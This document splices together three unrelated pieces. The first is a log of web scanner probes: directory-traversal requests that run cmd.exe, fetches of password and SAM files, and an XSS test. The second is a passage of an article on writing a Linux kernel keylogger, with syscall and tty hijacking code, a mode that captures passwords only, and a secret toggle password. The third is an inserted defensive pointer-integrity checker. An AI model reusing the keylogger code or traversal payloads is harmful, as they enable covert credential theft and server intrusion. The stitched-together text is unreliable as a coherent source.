GET***/cgi-bin/rguest.exe***200
GET***/cgi-bin/root.exe?/c+dir+c:\***200
GET***/cgi-bin/sam._***200
GET***/cgi-bin/scripts/***200
GET***/cgi-bin/scripts/Fpadmcgi.exe***200
GET***/cgi-bin/scripts/perl.exe***200
GET***/cgi-bin/scripts/perl?***200
GET***/cgi-bin/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm***200
GET***/cgi-bin/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm***200
GET***/cgi-bin/scripts/shopplus.cgi***200
GET***/cgi-bin/search97.vts***200
GET***/cgi-bin/sensepost.exe?/c+dir***200
GET***/cgi-bin/sensepost.exe?/c+dir+c:\***200
GET***/cgi-bin/shop.cgi***200
GET***/cgi-bin/shopper.cgi***200
GET***/cgi-bin/shtml.dll***200
GET***/cgi-bin/snorkerz.bat***200
GET***/cgi-bin/snorkerz.cmd***200
GET***/cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3***200
GET***/cgi-bin/statsconfig.pl***200
GET***/cgi-bin/test.bat***200
GET***/cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\***200
GET***/cgi-bin/test.cgi***200
GET***/cgi-bin/testcgi.exe***200
GET***/cgi-bin/tst.bat***200
GET***/cgi-bin/tst.bat\dir***200
GET***/cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\***200
GET***/cgi-bin/visadmin.exe***200
GET***/cgi-bin/visadmin.exe?user=guest***200
GET***/cgi-bin/visitor.exe***200
GET***/cgi-bin/wconsole.dll***200
GET***/cgi-bin/webbbs.exe***200
GET***/cgi-bin/webbbs/webbbs_config.pl***200
GET***/cgi-bin/webbbs/webbbs_post.pl***200
GET***/cgi-bin/webbbs/webbbs_settings.pl***200
GET***/cgi-bin/webplus.exe***200
GET***/cgi-bin/wguest.exe***200
GET***/cgi-bin/windmail.exe***200
GET***/cgi-bin/ws_ftp.ini***200
GET***/cgi-dos/args.bat***200
GET***/cgi-dos/args.cmd***200
GET***/cgi-shl/win-c-sample.exe***200
GET***/cgi-win***200
GET***/cgi-win/perl.exe***200
GET***/cgi-win/uploader.exe***200
GET***/cgi-win/wguest.exe***200
GET***/cgi-win/wincgi.bat***200
GET***/cgi/***200
GET***/cgi/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgibin***200
GET***/cgibin/***200
GET***/cmd.exe?/c+dir%20c:\***200
GET***/common/browser.inc***200
GET***/config/checks.txt***200
GET***/config/import.txt***200
GET***/config/mountain.cfg***200
GET***/config/orders.txt***200
GET***/contents/extensions/asp/1***200
GET***/cpqlogin.htm***200
GET***/database/db2000.mdb***200
GET***/default.asp%2e%41sp***200
GET***/default.asp%2e***200
GET***/default.asp%81***200
GET***/default.asp***200
GET***/default.asp+.htr***200
GET***/default.asp.***200
GET***/default.asp::$DATA***200
GET***/default.asp\\***200
GET***/scripts/tools/dsnform***200
GET***/scripts/tools/dsnform.exe***200
GET***/scripts/tools/getdrvrs.exe***200
GET***/scripts/tools/getdrvs.exe***200
GET***/scripts/tools/mkilog.exe***200
GET***/scripts/tools/newdsn.exe***200
GET***/scripts/tools/uploadn.asp***200
GET***/scripts/tools/uploadx.asp***200
GET***/scripts/upload.asp***200
GET***/scripts/uploadn.asp***200
GET***/scripts/uploadx.asp***200
GET***/scripts/visadmin.exe***200
GET***/scripts/visitor.exe***200
GET***/scripts/wa.exe***200
GET***/scripts/webbbs.exe***200
GET***/scripts/wguest.exe***200
GET***/scripts/ws_ftp.ini***200
GET***/scripts/wsisa.dll***200
GET***/search***200
GET***/search.asp?Search=>&lt;script&gt;alert()&lt;/script&gt;***200
GET***/search.dll***200
GET***/search/SQLQHit.asp***200
GET***/search/htx/SQLQHit.asp***200
GET***/search/htx/sqlqhit.asp***200
GET***/search/sqlqhit.asp***200
GET***/search97.vts***200
GET***/secure/.htaccess***200
GET***/secure/.wwwacl***200
GET***/server-info***200
GET***/server-status***200
GET***/servlet/SessionServlet***200
GET***/servlet/com.newatlanta.servletexec.JSP10Servlet/***200
GET***/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa***200
GET***/session/adminlogin***200
GET***/showfile.asp***200
GET***/siteseed/***200
GET***/siteserver/publishing/viewcode.asp?source=/default.asp***200
GET***/smdata.dat***200
GET***/smg_Smxcfg30.exe?vcc=3560121183d3***200
GET***/sqlqhit.asp***200
GET***/srchadm***200
GET***/ssi/envout.bat***200
GET***/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\***200
GET***/today.nsf***200
GET***/trace.axd***200
GET***/tree.dat***200
GET***/tsweb***200
GET***/tvcs/getservers.exe?action=selects1***200
GET***/upload.asp***200
GET***/uploadn.asp***200
GET***/uploadx.asp***200
GET***/user.dat***200
GET***/user.log***200
GET***/users/scripts/submit.cgi***200
GET***/wa.exe***200
GET***/whatever.htr***200
GET***/whisker.htr***200
GET***/whisker.htw***200
GET***/whisker.ida***200
GET***/whisker.idc***200
GET***/whisker.idq***200
GET***/ws_ftp.ini***200
GET***/wwwboard.pl***200
GET***/wwwboard/passwd.txt***200
GET***_vti_bin/_vti_aut/fp30reg.dll***500
HEAD***/…………………/config.sys***200
HEAD***/………………../boot.ini***200
HEAD***/………………./boot.ini***200
HEAD***/………………/boot.ini***200
HEAD***/……………../boot.ini***200
HEAD***/……………./boot.ini***200
HEAD***/……………/boot.ini***200
HEAD***/…………../boot.ini***200
HEAD***/…………./boot.ini***200
HEAD***/…………/boot.ini***200
HEAD***/………../boot.ini***200
HEAD***/………./boot.ini***200
HEAD***/………/boot.ini***200
HEAD***/……../boot.ini***200
HEAD***/……./boot.ini***200
HEAD***/……/boot.ini***200
HEAD***/…../boot.ini***200
HEAD***/…./Windows/Admin.pwl***200
HEAD***/…./Windows/Admin.pwl***403
HEAD***/…./boot.ini***200
HEAD***/…/boot.ini***200
HEAD***/../../../../../../../../boot.ini^webserver***200
HEAD***/../../../../../../../boot.ini^webserver***200
HEAD***/../../../../../../boot.ini^webserver***200
HEAD***/../../../../../boot.ini^webserver***200
HEAD***/../../../../../winnt/repair/sam._^webserver***200
HEAD***/../../../../boot.ini^webserver***200
HEAD***/../../../boot.ini^webserver***200
HEAD***/../../boot.ini^webserver***200
HEAD***/../../winnt/win.ini^webserver***200
HEAD***/../boot.ini***200
HEAD***/..\..\..\..\..\..\autoexec.bat^webserver***200
HEAD***/..\..\..\..\..\autoexec.bat^webserver***200
HEAD***/..\..\..\..\autoexec.bat^webserver***200
HEAD***/..\..\..\autoexec.bat^webserver***200
HEAD***/..\..\..\winnt\repair\sam._^webserver***200
HEAD***/..\..\autoexec.bat^webserver***200
HEAD***/AdvWorks/equipment/catalog_type.asp***200
HEAD***/AdvWorks/equipment/catalog_type.asp***403
HEAD***/Scripts***200
HEAD***/Scripts***403
HEAD***/Scripts/samples***200
HEAD***/Scripts/samples***403
HEAD***/Scripts/tools***200
HEAD***/Scripts/tools***403
HEAD***/\../boot.ini^webserver***200
HEAD***/\../config.sys^webserver***200
HEAD***/\../readme.txt^webserver***200
HEAD***/_private***200
HEAD***/_private***403
HEAD***/_vti_adm/admin.dll***200
HEAD***/_vti_adm/admin.dll***403
HEAD***/_vti_bin***200
HEAD***/_vti_bin***403
HEAD***/_vti_bin/_vti_adm***200
HEAD***/_vti_bin/_vti_adm***403
HEAD***/_vti_bin/_vti_aut***200
HEAD***/_vti_bin/_vti_aut***403
HEAD***/_vti_bin/_vti_aut/author.dll***200
HEAD***/_vti_bin/_vti_aut/author.dll***403
HEAD***/_vti_bin/_vti_aut/dvwssr.dll***200
HEAD***/_vti_bin/_vti_aut/dvwssr.dll***401
HEAD***/_vti_bin/_vti_aut/dvwssr.dll***500
HEAD***/_vti_bin/shtml.dll/_vti_rpc***200
HEAD***/_vti_bin/shtml.dll/_vti_rpc***403
HEAD***/_vti_log***200
HEAD***/_vti_log***403
HEAD***/_vti_pvt***200
HEAD***/_vti_pvt***403
HEAD***/_vti_txt***200
HEAD***/_vti_txt***403
HEAD***/admisapi/***200
HEAD***/admisapi/***403
HEAD***/cgi-bin/***200
HEAD***/cgi-bin/***403
HEAD***/cgi-bin/^webserver***200
HEAD***/cgi-bin/_vti_cnf***200
HEAD***/cgi-bin/_vti_cnf***403
HEAD***/cgi-bin/visitor.exe***200
HEAD***/cgi-bin/visitor.exe***403
HEAD***/cgi-win/wincgi.bat***200
HEAD***/cgi-win/wincgi.bat***403
HEAD***/cgi/^webserver***200
HEAD***/iisadmin***200
HEAD***/iisadmin***403
HEAD***/iisamples/Sdk***200
HEAD***/iisamples/Sdk***403
HEAD***/iissamples***200
HEAD***/iissamples***403
HEAD***/iissamples/Default***200
HEAD***/iissamples/Default***403
HEAD***/iissamples/ExAir***200
HEAD***/iissamples/ExAir***403
HEAD***/iissamples/ISSamples***200
HEAD***/iissamples/ISSamples***403
HEAD***/msadc/samples/adctest.asp***200
HEAD***/msadc/samples/adctest.asp***403
HEAD***/nofile.pl^webserver***200
HEAD***/scripts/../../cmd.exe***200
HEAD***/scripts/../../cmd.exe***403
HEAD***/scripts/Fpadmcgi.exe***200
HEAD***/scripts/Fpadmcgi.exe***403
HEAD***/scripts/IISADMPWD***200
HEAD***/scripts/IISADMPWD***403
HEAD***/scripts/convert.bas***200
HEAD***/scripts/convert.bas***403
HEAD***/scripts/cpshost.dll***200
HEAD***/scripts/cpshost.dll***403
HEAD***/scripts/iisadmin***200
HEAD***/scripts/iisadmin***403
HEAD***/scripts/iisadmin/default.htm***200
HEAD***/scripts/iisadmin/default.htm***403
HEAD***/scripts/iisadmin/samples***200
HEAD***/scripts/iisadmin/samples***403
HEAD***/scripts/iisadmin/tools***200
HEAD***/scripts/iisadmin/tools***403
HEAD***/scripts/perl***200
HEAD***/scripts/perl***403
HEAD***/scripts/proxy/w3proxy.dll***200
HEAD***/scripts/proxy/w3proxy.dll***403
HEAD***/srchadm***200
HEAD***/srchadm***403
POST***/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false***200
POST***/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false***200
POST***/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611***200
POST***/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611***200
TRACK***/***200

Linux Kernel Keylogger

March 3, 2007

--[ Contents

1 - Introduction

2 - How Linux keyboard driver work

3 - Kernel based keylogger approaches
3.1 - Interrupt handler
3.2 - Function hijacking
3.2.1 - handle_scancode
3.2.2 - put_queue
3.2.3 - receive_buf
3.2.4 - tty_read
3.2.5 - sys_read/sys_write

4 - vlogger
4.1 - The syscall/tty approach
4.2 - Features
4.3 - How to use

5 - Greets

6 - Keylogger source

--[ 1 - Introduction

This article is divided into two parts.  The first part gives an overview
of how the Linux keyboard driver works and discusses methods that can be
used to create a kernel based keylogger. This part will be useful for those
who want to write a kernel based keylogger, to write their own keyboard
driver (for supporting input of a non-supported language in a Linux
environment, ...) or to write programs that take advantage of the many
features of the Linux keyboard driver.

The second part presents the details of vlogger, a smart kernel based Linux
keylogger, and how to use it.  A keylogger is a very interesting piece of
code that is widely used in honeypots, hacked systems, ... by white and
black hats. As most of us know, besides user space keyloggers (such as iob,
uberkey, unixkeylogger, ...), there are some kernel based keyloggers. The
earliest kernel based keylogger is linspy by halflife, which was published
in Phrack 50 (see [4]).  The more recent kkeylogger is presented in the
'Kernel Based Keylogger' paper by mercenary (see [7]), which I found while
writing this paper. The common method those kernel based keyloggers use is
to log user keystrokes by intercepting the sys_read or sys_write system
call. However, this approach is quite unstable and slows down the whole
system noticeably, because sys_read (or sys_write) is the generic read/write
function of the system; sys_read is called whenever a process wants to read
something from a device (such as the keyboard, a file, a serial port, ...).
In vlogger, I used a better way to implement it that hijacks the tty buffer
processing function.

The reader is expected to be familiar with Linux Loadable Kernel Modules.
Reading articles [1] and [2] before going further is recommended.

--[ 2 - How Linux keyboard driver work

First, when you press a key on the keyboard, the keyboard sends the
corresponding scancodes to the keyboard driver.  A single key press can
produce a sequence of up to six scancodes.

The handle_scancode() function in the keyboard driver parses the stream
of scancodes and converts it into a series of key press and key release
events called keycodes, using a translation table via the kbd_translate()
function.  Each key is provided with a unique keycode k in the range 1-127.
Pressing key k produces keycode k, while releasing it produces keycode
k+128.

For example, the keycode of 'a' is 30. Pressing key 'a' produces keycode
30. Releasing 'a' produces keycode 158 (128+30).

Next, keycodes are converted to key symbols by looking them up in the
appropriate keymap.  This is quite a complex process. There are eight
possible modifiers (shift keys - Shift, AltGr, Control, Alt, ShiftL,
ShiftR, CtrlL and CtrlR), and the combination of currently active modifiers
and locks determines the keymap used.

After the above handling, the obtained characters are put into the raw
tty queue - tty_flip_buffer.

In the tty line discipline, the receive_buf() function is called
periodically to get characters from tty_flip_buffer and put them into the
tty read queue.

When a user process wants to get user input, it calls the read() function
on its stdin.  The sys_read() function calls the read() function defined in
the file_operations structure (which points to tty_read) of the
corresponding tty (e.g. /dev/tty0) to read input characters and return them
to the process.

The keyboard driver can be in one of 4 modes:
- scancode (RAW MODE): the application gets scancodes for input.
It is used by applications that implement their own keyboard
driver (ex: X11)

- keycode (MEDIUMRAW MODE): the application gets information on
which keys (identified by their keycodes) get pressed and
released.

- ASCII (XLATE MODE): the application effectively gets the
characters as defined by the keymap, using an 8-bit encoding.

- Unicode (UNICODE MODE): this mode only differs from the ASCII
mode by allowing the user to compose UTF8 unicode characters by
their decimal value, using Ascii_0 to Ascii_9, or their
hexadecimal (4-digit) value, using Hex_0 to Hex_9. A keymap can
be set up to produce UTF8 sequences (with a U+XXXX pseudo-symbol,
where each X is an hexadecimal digit).

Those modes influence what type of data applications will get as keyboard
input.  For more details on scancodes, keycodes and keymaps, please
read [3].

--[ 3 - Kernel based keylogger approaches

We can implement a kernel based keylogger in two ways: by writing our own
keyboard interrupt handler or by hijacking one of the input processing
functions.

----[ 3.1 - Interrupt handler

To log keystrokes, we will use our own keyboard interrupt handler. Under
Intel architectures, the IRQ of the keyboard controller is IRQ 1.  When it
receives a keyboard interrupt, our own keyboard interrupt handler reads the
scancode and keyboard status.  Keyboard events can be read and written via
ports 0x60 (keyboard data register) and 0x64 (keyboard status register).

/* below code is intel specific */
#define KEYBOARD_IRQ 1
#define KBD_STATUS_REG 0x64
#define KBD_CNTL_REG 0x64
#define KBD_DATA_REG 0x60

#define kbd_read_input() inb(KBD_DATA_REG)
#define kbd_read_status() inb(KBD_STATUS_REG)
#define kbd_write_output(val) outb(val, KBD_DATA_REG)
#define kbd_write_command(val) outb(val, KBD_CNTL_REG)

/* register our own IRQ handler */
request_irq(KEYBOARD_IRQ, my_keyboard_irq_handler, 0, "my keyboard", NULL);

In my_keyboard_irq_handler():
scancode = kbd_read_input();
key_status = kbd_read_status();
log_scancode(scancode);

This method is platform dependent. So it won't be portable among
platforms. And you have to be very careful with your interrupt handler if
you don't want to crash your box ;)

----[ 3.2 - Function hijacking

Based on Figure 1, we can implement our keylogger to log user inputs
by hijacking one of the handle_scancode(), put_queue(), receive_buf(),
tty_read() and sys_read() functions. Note that we can't intercept the
tty_insert_flip_char() function because it is an INLINE function.

------[ 3.2.1 - handle_scancode

This is the entry function of the keyboard driver (see keyboard.c).  It
handles scancodes which are received from keyboard.

# /usr/src/linux/drivers/char/keyboard.c
void handle_scancode(unsigned char scancode, int down);

We can replace the original handle_scancode() function with our own to log
all scancodes. But the handle_scancode() function is not a global and
exported function.  So to do this, we can use the kernel function hijacking
technique introduced by Silvio (see [5]).

/* below is a code snippet written by Plasmoid */
static struct semaphore hs_sem, log_sem;
static int logging=1;

#define CODESIZE 7
static char hs_code[CODESIZE];
static char hs_jump[CODESIZE] =
"\xb8\x00\x00\x00\x00"      /*      movl  $0,%eax  */
"\xff\xe0"                  /*      jmp   *%eax    */
;

void (*handle_scancode) (unsigned char, int) =
(void (*)(unsigned char, int)) HS_ADDRESS;

void _handle_scancode(unsigned char scancode, int keydown)
{
if (logging && keydown)
log_scancode(scancode, LOGFILE);

/*
* Restore first bytes of the original handle_scancode code.  Call
* the restored function and re-restore the jump code.  Code is
* protected by semaphore hs_sem, we only want one CPU in here at a
* time.
*/
down(&hs_sem);

memcpy(handle_scancode, hs_code, CODESIZE);
handle_scancode(scancode, keydown);
memcpy(handle_scancode, hs_jump, CODESIZE);

up(&hs_sem);
}

HS_ADDRESS is set by the Makefile executing this command
HS_ADDRESS=0x$(word 1,$(shell ksyms -a | grep handle_scancode))

Similar to the method presented in 3.1, the advantage of this method is the
ability to log keystrokes under X and the console, no matter if a tty is
invoked or not.  And you will know exactly what key is pressed on the
keyboard (including special keys such as Control, Alt, Shift, Print Screen,
...).  But this method is platform dependent and won't be portable among
platforms. This method also can't log keystrokes of remote sessions and is
quite complex for building an advanced logger.

------[ 3.2.2 - put_queue

This function is called by the handle_scancode() function to put
characters into tty_queue.

# /usr/src/linux/drivers/char/keyboard.c
void put_queue(int ch);

To intercept this function, we can use the same technique as in section
(3.2.1).

------[ 3.2.3 - receive_buf

The receive_buf() function is called by the low-level tty driver to send
characters received by the hardware to the line discipline for processing.

# /usr/src/linux/drivers/char/n_tty.c
static void n_tty_receive_buf(struct tty_struct *tty, const
                unsigned char *cp, char *fp, int count)

cp is a pointer to the buffer of input characters received by the device.
fp is a pointer to a pointer of flag bytes which indicate whether a
character was received with a parity error, etc.

Let's take a deeper look at the tty structures

# /usr/include/linux/tty.h
struct tty_struct {
    int magic;
    struct tty_driver driver;
    struct tty_ldisc ldisc;
    struct termios *termios, *termios_locked;
    ...
}

# /usr/include/linux/tty_ldisc.h
struct tty_ldisc {
    int magic;
    char *name;
    ...
    void (*receive_buf)(struct tty_struct *,
            const unsigned char *cp, char *fp, int count);
    int (*receive_room)(struct tty_struct *);
    void (*write_wakeup)(struct tty_struct *);
};

To intercept this function, we can save the original tty receive_buf()
function and then set ldisc.receive_buf to our own new_receive_buf()
function in order to log user inputs.

Ex: to log inputs on the tty0

int fd = open("/dev/tty0", O_RDONLY, 0);
struct file *file = fget(fd);
struct tty_struct *tty = file->private_data;
old_receive_buf = tty->ldisc.receive_buf;
tty->ldisc.receive_buf = new_receive_buf;

void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
char *fp, int count)
{
logging(tty, cp, count); //log inputs

/* call the original receive_buf */
(*old_receive_buf)(tty, cp, fp, count);
}

------[ 3.2.4 - tty_read

This function is called when a process wants to read input characters
from a tty via the sys_read() function.

# /usr/src/linux/drivers/char/tty_io.c
static ssize_t tty_read(struct file * file, char * buf, size_t count,
                loff_t *ppos)

static struct file_operations tty_fops = {
    llseek:  tty_lseek,
    read:    tty_read,
    write:   tty_write,
    poll:    tty_poll,
    ioctl:   tty_ioctl,
    open:    tty_open,
    release: tty_release,
    fasync:  tty_fasync,
};

To log inputs on the tty0:

int fd = open("/dev/tty0", O_RDONLY, 0);
struct file *file = fget(fd);
old_tty_read = file->f_op->read;
file->f_op->read = new_tty_read;

------[ 3.2.5 - sys_read/sys_write

We will intercept the sys_read/sys_write system calls to redirect them to
our own code, which logs the content of the read/write calls. This method
was presented by halflife in Phrack 50 (see [4]).  I highly recommend
reading that paper and a great article written by pragmatic called
"Complete Linux Loadable Kernel Modules" (see [2]).

The code to intercept sys_read/sys_write will be something like this:

extern void *sys_call_table[];
original_sys_read = sys_call_table[__NR_read];
sys_call_table[__NR_read] = new_sys_read;

--[ 4 - vlogger

This part introduces my kernel keylogger, which uses the method described
in section 3.2.3 to acquire more abilities than common keyloggers that use
the sys_read/sys_write system call replacement approach. I have tested the
code with the following versions of the Linux kernel: 2.4.5, 2.4.7, 2.4.17
and 2.4.18.

----[ 4.1 - The syscall/tty approach

To log both local (logged from console) and remote sessions, I chose
the method of intercepting the receive_buf() function (see 3.2.3).

In the kernel, the tty_struct and tty_queue structures are dynamically
allocated only when the tty is opened. Thus, we also have to intercept the
sys_open syscall to dynamically hook the receive_buf() function of each
tty or pty when it's invoked.

// to intercept open syscall
original_sys_open = sys_call_table[__NR_open];
sys_call_table[__NR_open] = new_sys_open;

// new_sys_open()
asmlinkage int new_sys_open(const char *filename, int flags, int mode)
{

// call the original_sys_open
ret = (*original_sys_open)(filename, flags, mode);

if (ret >= 0) {
struct tty_struct * tty;

file = fget(ret);
tty = file->private_data;
if (tty != NULL &&

tty->ldisc.receive_buf != new_receive_buf) {

// save the old receive_buf
old_receive_buf = tty->ldisc.receive_buf;

/*
* init to intercept receive_buf of this tty
* tty->ldisc.receive_buf = new_receive_buf;
*/
init_tty(tty, TTY_INDEX(tty));
}

}

// our new receive_buf() function
void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
char *fp, int count)
{
if (!tty->real_raw && !tty->raw)// ignore raw mode
// call our logging function to log user inputs
vlogger_process(tty, cp, count);
// call the original receive_buf
(*old_receive_buf)(tty, cp, fp, count);
}
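
Seen from the defender's side, sections 3.2.3, 3.2.4, 3.2.5 and 4.1 all replace a function pointer (a sys_call_table slot, tty->ldisc.receive_buf, tty_fops.read) with an address inside a loaded module, which an integrity check against the kernel's symbol map can flag. The following is an added example, not part of the original article or of vlogger; the System.map excerpt, the addresses and the observed pointer values are constructed, and how the pointers are read from a live kernel or memory image is assumed to be handled elsewhere.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

enum verdict { PTR_OK, PTR_MISMATCH, PTR_OUTSIDE_TEXT, PTR_UNKNOWN };

/* Constructed System.map excerpt; every address is made up for the example. */
static const char SAMPLE_MAP[] =
    "c0100000 T _stext\n"
    "c012dc10 T sys_open\n"
    "c012e4a0 T sys_read\n"
    "c012e5b0 T sys_write\n"
    "c0190a20 t tty_read\n"
    "c0193c80 t n_tty_receive_buf\n"
    "c0240000 A _etext\n";

/* One pointer taken from the inspected kernel plus the symbol it should hold. */
struct observed {
    const char *slot;       /* where the pointer lives */
    const char *expected;   /* symbol it should resolve to */
    unsigned long value;    /* what was actually found there */
};

/* Constructed observations: two clean slots and three replaced ones. */
static const struct observed SAMPLE_PTRS[] = {
    { "sys_call_table[__NR_read]",  "sys_read",          0xc012e4a0UL },
    { "sys_call_table[__NR_write]", "sys_write",         0xc012e5b0UL },
    { "sys_call_table[__NR_open]",  "sys_open",          0xd0871060UL },
    { "tty->ldisc.receive_buf",     "n_tty_receive_buf", 0xd08710f4UL },
    { "tty_fops.read",              "tty_read",          0xc0190a30UL },
};
#define SAMPLE_PTRS_N (sizeof SAMPLE_PTRS / sizeof SAMPLE_PTRS[0])

/* Find sym in "address type name" lines; returns 1 and sets *addr on a hit. */
static int map_lookup(const char *map, const char *sym, unsigned long *addr)
{
    const char *p = map;

    while (p && *p) {
        unsigned long a;
        char type, name[64];

        if (sscanf(p, "%lx %c %63s", &a, &type, name) == 3 &&
            strcmp(name, sym) == 0) {
            *addr = a;
            return 1;
        }
        p = strchr(p, '\n');
        if (p)
            p++;
    }
    return 0;
}

/* Classify one pointer against the kernel text range and its expected symbol. */
enum verdict check_pointer(const char *map, const char *expected_sym,
                           unsigned long value)
{
    unsigned long stext, etext, expected;

    if (!map_lookup(map, "_stext", &stext) ||
        !map_lookup(map, "_etext", &etext) || stext >= etext)
        return PTR_UNKNOWN;
    /* Module memory lies outside [_stext, _etext). */
    if (value < stext || value >= etext)
        return PTR_OUTSIDE_TEXT;
    if (!map_lookup(map, expected_sym, &expected))
        return PTR_UNKNOWN;
    return value == expected ? PTR_OK : PTR_MISMATCH;
}

/* Number of observed pointers that are anything other than PTR_OK. */
size_t count_suspect(const char *map, const struct observed *o, size_t n)
{
    size_t i, bad = 0;

    for (i = 0; i < n; i++)
        if (check_pointer(map, o[i].expected, o[i].value) != PTR_OK)
            bad++;
    return bad;
}

int main(void)
{
    static const char *label[] = {
        "ok", "MISMATCH", "OUTSIDE KERNEL TEXT", "unknown"
    };
    size_t i;

    for (i = 0; i < SAMPLE_PTRS_N; i++) {
        const struct observed *o = &SAMPLE_PTRS[i];
        printf("%-28s %08lx  %s\n", o->slot, o->value,
               label[check_pointer(SAMPLE_MAP, o->expected, o->value)]);
    }
    printf("%lu suspect pointer(s)\n",
           (unsigned long)count_suspect(SAMPLE_MAP, SAMPLE_PTRS, SAMPLE_PTRS_N));
    return 0;
}
```

A pointer comparison like this does not cover the approach of section 3.2.1, which overwrites the first bytes of the function itself; that case needs the function's code compared against a trusted kernel image.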

----[ 4.2 - Features

- Logs both local and remote sessions (via tty & pts)

- Separate logging for each tty/session. Each tty has its own logging
  buffer.

- Supports nearly all special chars such as arrow keys (left, right, up,
  down), F1 to F12, Shift+F1 to Shift+F12, Tab, Insert, Delete, End,
  Home, Page Up, Page Down, BackSpace, ...

- Supports some line editing keys, including CTRL-U and BackSpace.

- Timestamped logging, timezone supported (ripped off some code from
  libc).

- Multiple logging modes

    o dumb mode: logs all keystrokes

    o smart mode: detects password prompts automatically to log
      user/password only.  I used a technique similar to the one
      presented in the "Passive Analysis of SSH (Secure Shell) Traffic"
      paper by Solar Designer and Dug Song (see [6]). When the
      application turns input echoing off, we assume that it is for
      entering a password.

    o normal mode: disables logging

You can switch between logging modes by using a magic password.

#define VK_TOGLE_CHAR 29 // CTRL-]
#define MAGIC_PASS "31337" // to switch mode, type MAGIC_PASS
// then press VK_TOGLE_CHAR key

----[ 4.3 - How to use

Change the following options

// directory to store log files
#define LOG_DIR "/tmp/log"

// your local timezone
#define TIMEZONE 7*60*60 // GMT+7

// your magic password
#define MAGIC_PASS "31337"

Below is what the log files look like:

[root@localhost log]# ls -l
total 60
-rw-------   1 root     root          633 Jun 19 20:59 pass.log
-rw-------   1 root     root        37593 Jun 19 18:51 pts11
-rw-------   1 root     root           56 Jun 19 19:00 pts20
-rw-------   1 root     root          746 Jun 19 20:06 pts26
-rw-------   1 root     root          116 Jun 19 19:57 pts29
-rw-------   1 root     root         3219 Jun 19 21:30 tty1
-rw-------   1 root     root        18028 Jun 19 20:54 tty2

